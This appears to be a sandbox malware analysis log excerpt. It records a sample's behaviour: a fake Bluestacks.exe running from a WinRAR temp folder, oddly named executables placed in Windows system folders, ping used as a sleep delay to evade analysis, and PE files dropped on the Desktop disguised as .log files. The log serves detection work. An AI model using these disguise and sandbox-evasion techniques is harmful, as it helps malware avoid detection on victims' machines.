Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Memory allocated: 880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Memory allocated: 1A6E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Memory allocated: A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Memory allocated: 1A4E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Memory allocated: 1530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Memory allocated: 1B140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\ShellComponents\cmd.exe	Memory allocated: C00000 memory reserve \| memory write watch
Source: C:\Windows\ShellComponents\cmd.exe	Memory allocated: 1A9D0000 memory reserve \| memory write watch
Source: C:\Windows\ShellComponents\cmd.exe	Memory allocated: 820000 memory reserve \| memory write watch
Source: C:\Windows\ShellComponents\cmd.exe	Memory allocated: 1A4A0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Memory allocated: E30000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Memory allocated: 1A920000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Memory allocated: 1040000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Memory allocated: 1ADD0000 memory reserve \| memory write watch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	Memory allocated: 1510000 memory reserve \| memory write watch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	Memory allocated: 1B1C0000 memory reserve \| memory write watch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	Memory allocated: 10B0000 memory reserve \| memory write watch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	Memory allocated: 1AC40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe	Memory allocated: 1180000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe	Memory allocated: 1ADC0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 599703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 599587	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 596608	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 596218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 595451	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\ShellComponents\cmd.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\ShellComponents\cmd.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Window / User API: threadDelayed 4571	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Window / User API: threadDelayed 1404	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1972
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1369
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1453
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1234
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1457
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1671
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1561
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1396
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1324
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1403
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1240
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1321
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1663
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1478
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1673
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1476
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1453

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uAazTYNi.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mPirFwXv.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TxvLlrMg.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rCAqismj.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BlUGSVrR.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DvqGSnXS.log	Jump to dropped file
